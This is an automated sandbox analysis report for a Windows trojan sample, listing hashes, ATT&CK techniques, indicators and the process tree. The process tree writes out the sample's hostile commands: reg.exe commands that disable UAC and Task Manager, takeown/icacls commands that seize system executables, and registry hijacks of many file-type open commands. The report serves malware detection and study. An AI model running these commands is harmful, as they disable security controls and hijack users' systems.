49939f76f0db468d1fe3314b2aa7d6c9140a01358a99f2d09d206708ea61c1c1

Analysis

max time kernel
136s
max time network
120s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
15/10/2023, 19:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Size

324KB
MD5

625a47d9db42e86c1fbb30b221956fe0
SHA1

07871f2b30a80a24b787d6dbc1a1564c6df97847
SHA256

49939f76f0db468d1fe3314b2aa7d6c9140a01358a99f2d09d206708ea61c1c1
SHA512

4534e9935cc9422ec3352c3ec5dc3d644b537129981f2ada420ac2fa55f53693ea462dbd14b467c6efebb551660dae65d8718bf46c728687ac660b3399196088
SSDEEP

6144:/pW2bgbbV28okoS1oWMkdlZQ5iioct0IwdNOutmW:/pW2IoioS66h

Score

10^/10

discovery evasion exploit persistence trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
3076	icacls.exe
2532	icacls.exe
3856	icacls.exe
3936	icacls.exe
2704	icacls.exe
2348	icacls.exe
872	takeown.exe
4088	icacls.exe
2748	icacls.exe
2644	takeown.exe
660	icacls.exe
3500	takeown.exe
3636	icacls.exe
3928	takeown.exe
2992	takeown.exe
2032	takeown.exe
540	takeown.exe
3236	takeown.exe
3724	takeown.exe
2844	takeown.exe
1636	takeown.exe
1620	icacls.exe
2784	icacls.exe
1788	takeown.exe
2976	icacls.exe
1688	takeown.exe
3612	takeown.exe
1200	icacls.exe
2636	icacls.exe
4052	icacls.exe
4156	takeown.exe
2356	icacls.exe
3584	takeown.exe
2504	icacls.exe
1568	icacls.exe
2256	icacls.exe
3920	icacls.exe
1500	icacls.exe
2400	takeown.exe
1132	takeown.exe
2004	icacls.exe
2228	takeown.exe
3684	icacls.exe
2516	takeown.exe
2440	icacls.exe
3532	takeown.exe
3004	takeown.exe
1296	takeown.exe
1932	takeown.exe
3804	takeown.exe
2336	takeown.exe
2028	takeown.exe
2552	icacls.exe
2512	icacls.exe
1760	takeown.exe
756	takeown.exe
1252	icacls.exe
3708	takeown.exe
3892	takeown.exe
3188	icacls.exe
3420	icacls.exe
2124	takeown.exe
1232	icacls.exe
3748	icacls.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1760	takeown.exe
2256	icacls.exe
2868	takeown.exe
1740	icacls.exe
1304	icacls.exe
2532	icacls.exe
2084	icacls.exe
3236	takeown.exe
2720	icacls.exe
2320	takeown.exe
2992	takeown.exe
3684	icacls.exe
3984	takeown.exe
4140	icacls.exe
2624	icacls.exe
1336	icacls.exe
3108	icacls.exe
3148	icacls.exe
3572	icacls.exe
3584	takeown.exe
4024	takeown.exe
2600	takeown.exe
2388	icacls.exe
3300	icacls.exe
3004	takeown.exe
2740	icacls.exe
1500	icacls.exe
2984	icacls.exe
3460	icacls.exe
4080	takeown.exe
2224	takeown.exe
2124	takeown.exe
1804	takeown.exe
1044	icacls.exe
2804	takeown.exe
3048	icacls.exe
1928	icacls.exe
3732	icacls.exe
2116	takeown.exe
1620	icacls.exe
1512	icacls.exe
2068	icacls.exe
3636	icacls.exe
3740	takeown.exe
2028	takeown.exe
832	takeown.exe
3084	takeown.exe
3500	takeown.exe
3884	icacls.exe
3892	takeown.exe
1300	takeown.exe
2164	takeown.exe
2032	takeown.exe
2000	takeown.exe
1384	takeown.exe
896	icacls.exe
2608	icacls.exe
3132	takeown.exe
1232	icacls.exe
3380	icacls.exe
3436	icacls.exe
3920	icacls.exe
3928	takeown.exe
2216	takeown.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe BATCF %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\xpsrchvw.exe	625a47d9db42e86c1fbb30b221956fe0_exe32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 13 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe BATCF %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe JPGIF %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe HTMWF %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe NTPAD %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe JPGIF %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe NTPAD %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe CMDSF %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe RTFDF %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe NTPAD %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe JPGIF %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe JPGIF %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe VBSSF %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\625a47d9db42e86c1fbb30b221956fe0_exe32.exe NTPAD %1"	625a47d9db42e86c1fbb30b221956fe0_exe32.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2248	reg.exe
1584	reg.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe
Token: SeTakeOwnershipPrivilege	2600	takeown.exe
Token: SeTakeOwnershipPrivilege	2660	takeown.exe
Token: SeTakeOwnershipPrivilege	2272	takeown.exe
Token: SeTakeOwnershipPrivilege	2472	takeown.exe
Token: SeTakeOwnershipPrivilege	1176	takeown.exe
Token: SeTakeOwnershipPrivilege	2564	takeown.exe
Token: SeTakeOwnershipPrivilege	1324	takeown.exe
Token: SeTakeOwnershipPrivilege	980	takeown.exe
Token: SeTakeOwnershipPrivilege	2224	takeown.exe
Token: SeTakeOwnershipPrivilege	756	takeown.exe
Token: SeTakeOwnershipPrivilege	2716	takeown.exe
Token: SeTakeOwnershipPrivilege	2868	takeown.exe
Token: SeTakeOwnershipPrivilege	1524	takeown.exe
Token: SeTakeOwnershipPrivilege	2908	takeown.exe
Token: SeTakeOwnershipPrivilege	2336	takeown.exe
Token: SeTakeOwnershipPrivilege	2844	takeown.exe
Token: SeTakeOwnershipPrivilege	3044	takeown.exe
Token: SeTakeOwnershipPrivilege	3004	takeown.exe
Token: SeTakeOwnershipPrivilege	3036	takeown.exe
Token: SeTakeOwnershipPrivilege	2516	takeown.exe
Token: SeTakeOwnershipPrivilege	2480	takeown.exe
Token: SeTakeOwnershipPrivilege	2896	takeown.exe
Token: SeTakeOwnershipPrivilege	1788	takeown.exe
Token: SeTakeOwnershipPrivilege	1300	takeown.exe
Token: SeTakeOwnershipPrivilege	2796	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1712 wrote to memory of 1584	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	28
PID 1712 wrote to memory of 1584	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	28
PID 1712 wrote to memory of 1584	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	28
PID 1712 wrote to memory of 2248	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	29
PID 1712 wrote to memory of 2248	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	29
PID 1712 wrote to memory of 2248	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	29
PID 1712 wrote to memory of 2600	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	32
PID 1712 wrote to memory of 2600	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	32
PID 1712 wrote to memory of 2600	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	32
PID 1712 wrote to memory of 2648	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	34
PID 1712 wrote to memory of 2648	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	34
PID 1712 wrote to memory of 2648	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	34
PID 1712 wrote to memory of 2272	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	35
PID 1712 wrote to memory of 2272	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	35
PID 1712 wrote to memory of 2272	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	35
PID 1712 wrote to memory of 2748	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	38
PID 1712 wrote to memory of 2748	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	38
PID 1712 wrote to memory of 2748	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	38
PID 1712 wrote to memory of 2660	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	39
PID 1712 wrote to memory of 2660	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	39
PID 1712 wrote to memory of 2660	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	39
PID 1712 wrote to memory of 2752	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	42
PID 1712 wrote to memory of 2752	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	42
PID 1712 wrote to memory of 2752	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	42
PID 1712 wrote to memory of 1176	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	44
PID 1712 wrote to memory of 1176	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	44
PID 1712 wrote to memory of 1176	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	44
PID 1712 wrote to memory of 2588	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	45
PID 1712 wrote to memory of 2588	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	45
PID 1712 wrote to memory of 2588	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	45
PID 1712 wrote to memory of 2564	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	46
PID 1712 wrote to memory of 2564	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	46
PID 1712 wrote to memory of 2564	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	46
PID 1712 wrote to memory of 1440	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	47
PID 1712 wrote to memory of 1440	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	47
PID 1712 wrote to memory of 1440	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	47
PID 1712 wrote to memory of 2472	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	50
PID 1712 wrote to memory of 2472	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	50
PID 1712 wrote to memory of 2472	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	50
PID 1712 wrote to memory of 2484	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	51
PID 1712 wrote to memory of 2484	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	51
PID 1712 wrote to memory of 2484	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	51
PID 1712 wrote to memory of 2516	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	52
PID 1712 wrote to memory of 2516	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	52
PID 1712 wrote to memory of 2516	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	52
PID 1712 wrote to memory of 2572	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	53
PID 1712 wrote to memory of 2572	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	53
PID 1712 wrote to memory of 2572	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	53
PID 1712 wrote to memory of 3036	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	54
PID 1712 wrote to memory of 3036	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	54
PID 1712 wrote to memory of 3036	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	54
PID 1712 wrote to memory of 2096	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	62
PID 1712 wrote to memory of 2096	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	62
PID 1712 wrote to memory of 2096	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	62
PID 1712 wrote to memory of 2224	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	60
PID 1712 wrote to memory of 2224	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	60
PID 1712 wrote to memory of 2224	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	60
PID 1712 wrote to memory of 1044	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	55
PID 1712 wrote to memory of 1044	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	55
PID 1712 wrote to memory of 1044	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	55
PID 1712 wrote to memory of 2336	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	56
PID 1712 wrote to memory of 2336	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	56
PID 1712 wrote to memory of 2336	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	56
PID 1712 wrote to memory of 2728	1712	625a47d9db42e86c1fbb30b221956fe0_exe32.exe	63

C:\Users\Admin\AppData\Local\Temp\625a47d9db42e86c1fbb30b221956fe0_exe32.exe
"C:\Users\Admin\AppData\Local\Temp\625a47d9db42e86c1fbb30b221956fe0_exe32.exe"
1⤵
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - UAC bypass
  - Modifies registry key
  PID:1584
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:2248
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\bfsvc.exe"
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2600
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2648
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\HelpPane.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2748
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\hh.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2660
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2752
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\splwow64.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1176
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2588
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\winhlp32.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2564
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1440
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\write.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2472
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2484
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\raserver.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2516
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2572
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\msra.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3036
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:1044
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2336
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2224
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2096
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2728
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:3004
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3048
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\logagent.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3060
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2908
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2844
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2356
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2720
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1324
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2440
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2716
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1632
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:756
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:972
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\runas.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:980
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1524
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1620
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2784
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:2868
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2888
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2480
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2704
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:1252
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2896
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  PID:2920
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2552
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2028
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\xpsrchvw.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2624
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S NGTQGRML /U Admin /F "C:\Windows\System32\xpsrchvw.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2796
- C:\Windows\System32\icacls.exe
